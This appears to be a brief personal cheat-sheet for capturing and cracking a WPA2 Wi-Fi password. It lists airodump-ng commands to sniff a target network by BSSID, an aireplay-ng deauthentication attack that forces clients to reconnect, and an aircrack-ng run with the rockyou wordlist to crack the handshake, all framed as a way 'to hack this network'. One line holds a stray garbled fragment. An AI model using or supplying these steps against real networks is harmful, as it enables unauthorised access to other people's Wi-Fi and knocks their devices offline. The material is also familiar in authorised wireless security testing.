Capture and Crack WPA2
monitor all network
airodump-ng wlan0
monitor specific network
airodump-ng wlan0 --channel 10 --bssid D8:29:18:0A:08:91 --write wpa2
then use deauth attack by another cart or power down network from device manual
aireplay-ng --deauth 25 -a D8:29:18:0A:08:91 wlan1
after the client re-authenticate we notice #Data
is increased
exit sniff mode aاشىىثم 6nd use aircrack and wordlist to hack this network
aircrack-ng wpa2-01.* -w /home/irix/wordlist/rockyou.txt

Last updated